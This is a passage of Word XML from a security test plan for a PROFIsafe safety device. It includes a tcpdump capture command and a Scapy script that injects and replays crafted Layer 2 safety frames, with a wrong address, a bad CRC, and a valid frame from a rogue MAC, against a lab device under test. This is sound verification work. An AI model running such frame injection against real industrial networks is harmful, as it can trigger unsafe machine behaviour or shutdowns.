          <w:p w14:paraId="02C97F95" w14:textId="77777777" w:rsidR="00770344"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 xml:space="preserve">Prove that the F-Device rejects (→ passivation) frames with </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F6C1321" w14:textId="77777777" w:rsidR="00770344"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 xml:space="preserve">(a) an incorrect F_Dest_Add and </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD82865" w14:textId="77777777" w:rsidR="00770344"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 xml:space="preserve">(b) an invalid CRC, and characterise the boundary of the mitigation by injecting </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73DD2BF7" w14:textId="5026CECB" w:rsidR="00105328" w:rsidRPr="003306B2"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(c) a frame with correct F_Dest_Add + valid CRC from an unauthorised originator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105328" w14:paraId="339E3EF7"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3ED4A0EA" w14:textId="77777777" w:rsidR="00105328" w:rsidRDefault="00105328" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7947962A" w14:textId="3C744366" w:rsidR="00CA763E" w:rsidRDefault="00241CD9" w:rsidP="00CA763E">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1. </w:t>
            </w:r>
            <w:r w:rsidR="00770344" w:rsidRPr="00770344">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">With cyclic traffic running, inject crafted FSCP frames: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="132C46EF" w14:textId="77777777" w:rsidR="00CA763E" w:rsidRDefault="00770344">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770344">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>wrong F_Dest_Add</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F0EEF43" w14:textId="54B127E6" w:rsidR="00CA763E" w:rsidRDefault="00770344">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770344">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>correct F_Dest_Add</w:t>
            </w:r>
            <w:r w:rsidR="00123B2C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="00123B2C" w:rsidRPr="00123B2C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidR="00123B2C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> safe outcome)</w:t>
            </w:r>
            <w:r w:rsidRPr="00770344">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, corrupted CRC/payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B29E979" w14:textId="77777777" w:rsidR="00B217A0" w:rsidRDefault="00770344">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770344">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>correct F_Dest_Add + recomputed valid CRC, attacker MAC.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66505A1F" w14:textId="2E843BFE" w:rsidR="00105328" w:rsidRPr="00CF2F7C" w:rsidRDefault="00241CD9" w:rsidP="00B217A0">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 </w:t>
            </w:r>
            <w:r w:rsidR="00770344" w:rsidRPr="00770344">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Observe qualifier, outputs, diagnostics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105328" w:rsidRPr="00316EA1" w14:paraId="54B77E4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E24C31" w14:textId="77777777" w:rsidR="00105328" w:rsidRDefault="00105328" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1C959C" w14:textId="77777777" w:rsidR="007E1D5B" w:rsidRDefault="00241CD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41CD9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS (a,b) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="356A9144" w14:textId="77777777" w:rsidR="007E1D5B" w:rsidRDefault="00241CD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41CD9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if the DUT ignores/rejects the frame and either continues on legitimate traffic or passivates to safe state (outputs Low, qualifier bad)</w:t>
            </w:r>
            <w:r w:rsidR="007E1D5B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00241CD9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> no unsafe </w:t>
            </w:r>
            <w:r w:rsidRPr="00241CD9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>output actuation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46725D5A" w14:textId="77777777" w:rsidR="008C1401" w:rsidRDefault="00241CD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41CD9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(c) expected result = frame accepted (proving Gap G-2, that authenticity depends on the black channel). This must be documented as a residual risk covered by SRIO-9402, not scored as device FAIL. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="013476A0" w14:textId="2C740E4D" w:rsidR="00105328" w:rsidRPr="003306B2" w:rsidRDefault="00241CD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41CD9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FAIL if (a) or (b) causes an uncommanded/hazardous output change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C88FB20" w14:textId="77777777" w:rsidR="00105328" w:rsidRPr="00105328" w:rsidRDefault="00105328" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB94133" w14:textId="77777777" w:rsidR="00105328" w:rsidRPr="00105328" w:rsidRDefault="00105328" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED200B9" w14:textId="09BFB871" w:rsidR="00664BBB" w:rsidRDefault="00DB074F" w:rsidP="00665600">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2 </w:t>
      </w:r>
      <w:r w:rsidR="00664BBB">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64BBB" w14:paraId="39DF65D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CC921" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F6CBEC4" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRDefault="00664BBB"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64BBB" w14:paraId="758BC1B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5357C0" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5A4EBE" w14:textId="3752D0FA" w:rsidR="00664BBB" w:rsidRPr="002A51F8" w:rsidRDefault="00233B14" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002A51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t>TC-RQ001-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00664BBB" w14:paraId="14941EBA"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D944D19" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B38CCA2" w14:textId="77777777" w:rsidR="00233B14" w:rsidRPr="002A51F8" w:rsidRDefault="00233B14"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xml:space="preserve">Pi (Kali) eth0 = 192.168.0.100 side-injecting into the switch; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A2B3FE9" w14:textId="77777777" w:rsidR="00233B14" w:rsidRPr="002A51F8" w:rsidRDefault="00233B14"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xml:space="preserve">DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78630742" w14:textId="77777777" w:rsidR="00233B14" w:rsidRPr="002A51F8" w:rsidRDefault="00233B14"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xml:space="preserve">SPS 192.168.0.1; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D3C7CFE" w14:textId="383F8877" w:rsidR="00664BBB" w:rsidRPr="002A51F8" w:rsidRDefault="00233B14"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Laptop mirror = Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00664BBB" w14:paraId="7516E9F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6B8231" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="646E4340" w14:textId="61692EF7" w:rsidR="00664BBB" w:rsidRPr="002A51F8" w:rsidRDefault="00033CDA"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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Scapy (Pi), Wireshark (laptop)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00664BBB" w:rsidRPr="00316EA1" w14:paraId="4F878759"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B1A3193" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441B27DA" w14:textId="29679A6D"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Capture the live PROFINET/PROFIsafe frame first (tcpdump -i eth0 -w ref.pcap ether proto 0x8892), then replay/mutate:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5670A668"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60D4B2BB"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0"/>
            <w:r w:rsidRPr="002A51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD99649"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TC-RQ001-02 PROFIsafe frame injection (Layer 2, EtherType 0x8892)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68674D01"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from scapy.all import Ether, Raw, sendp, rdpcap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E01FB13"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IFACE = "eth0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D09EE55"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 take one legitimate cyclic frame captured from the mirror as template ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5108F1F8"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tmpl = rdpcap("ref.pcap")[0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7169B660" w14:textId="32E82C66"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payload = bytes(tmpl[Raw].load) # PN-RT + PROFIsafe (PD + status/control + 4-byte CRC)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F8662CD"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def inject(name, data, dst=tmpl[Ether].dst, src="02:11:22:33:44:55"):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61896242"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frm = Ether(dst=dst, src=src, type=0x8892)/Raw(load=data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E8B6DB1"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sendp(frm, iface=IFACE, count=200, inter=0.002) # ~cycle time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FC18D5"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print(f"[+] sent case: {name}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63519531"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4BD575B5"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(a) WRONG F_Dest_Add -&gt; flip the destination-address-bearing bytes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="571172B9"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a = bytearray(payload); a[-6] ^= 0xFF # offset per your frame map</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="536B1878"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inject("a_wrong_dest", bytes(a))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E9697B3"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02467B48"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(b) CORRUPT CRC / payload (bit-flip -&gt; CRC mismatch)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64F4370C"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b = bytearray(payload); b[2] ^= 0x01 # flip a PD bit, leave CRC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07F0A28E"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inject("b_bad_crc", bytes(b))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3598C7E0"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4138AF3F"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(c) BOUNDARY: correct F_Dest + recomputed valid CRC, attacker source MAC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A7D9AE"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(replay of a fully valid frame =&gt; demonstrates Gap G-2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4377370B" w14:textId="400F5F8B"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inject("c_valid_from_rogue", payload)</w:t>
            </w:r>
            <w:commentRangeEnd w:id="0"/>
            <w:r w:rsidRPr="002A51F8">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="0"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00664BBB" w14:paraId="28F423A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603FD2" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="107D10A4" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRPr="002A51F8" w:rsidRDefault="00664BBB"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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail-___</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00664BBB" w:rsidRPr="00316EA1" w14:paraId="279340F1"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39083008" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A277A80" w14:textId="1E2FD52D" w:rsidR="00664BBB" w:rsidRPr="002A51F8" w:rsidRDefault="00D658E1"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TC02_inject.pcapng (mirror), Pi console log, SRIO FS/P-LED photo, PLC diagnostic buffer export</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06AF4003" w14:textId="7E3D4FBF" w:rsidR="00DB074F" w:rsidRPr="00FD6890" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C377A6D" w14:textId="5FCB8628" w:rsidR="00DB074F" w:rsidRPr="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ001-03 </w:t>
      </w:r>
      <w:r w:rsidR="00262A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Watchdog / Staleness (F_WD_Time) → Safe State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47605813" w14:textId="306FF42B" w:rsidR="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1 </w:t>
      </w:r>
      <w:r w:rsidR="00262A1D">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EC056D" w14:paraId="3EB9629E"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AB44B0" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2276B2E3" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRDefault="00EC056D"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EC056D" w14:paraId="46133B91"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09220F" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E6C9169" w14:textId="4A9794B2" w:rsidR="00EC056D" w:rsidRPr="00EC056D" w:rsidRDefault="00EC056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C056D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ001-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC056D" w:rsidRPr="00316EA1" w14:paraId="0013669A"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6AE0FC05" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54313D8F" w14:textId="538064E9" w:rsidR="00EC056D" w:rsidRPr="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC056D">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>RQ-001 → CR 3.1 → Asset C, Asset A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC056D" w14:paraId="349FB1A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53D8A6" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42AAFC59" w14:textId="03B297A8" w:rsidR="00EC056D" w:rsidRPr="00EC056D" w:rsidRDefault="00EC056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C056D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Denial of Service </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC056D" w14:paraId="04CB9587"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6D6E1FD6" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34C85758" w14:textId="37F0A6C8" w:rsidR="00EC056D" w:rsidRPr="00EC056D" w:rsidRDefault="000344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34466">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2 (Threat-Mitigation Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC056D" w:rsidRPr="00316EA1" w14:paraId="18A310D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340542" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D203BCE" w14:textId="5AF64625" w:rsidR="00EC056D" w:rsidRPr="00EC056D" w:rsidRDefault="0003446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34466">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify that interruption of the black channel longer than F_WD_Time causes passivation to the defined safe state (outputs Low, qualifier bad) and that re-integration requires explicit acknowledgment </w:t>
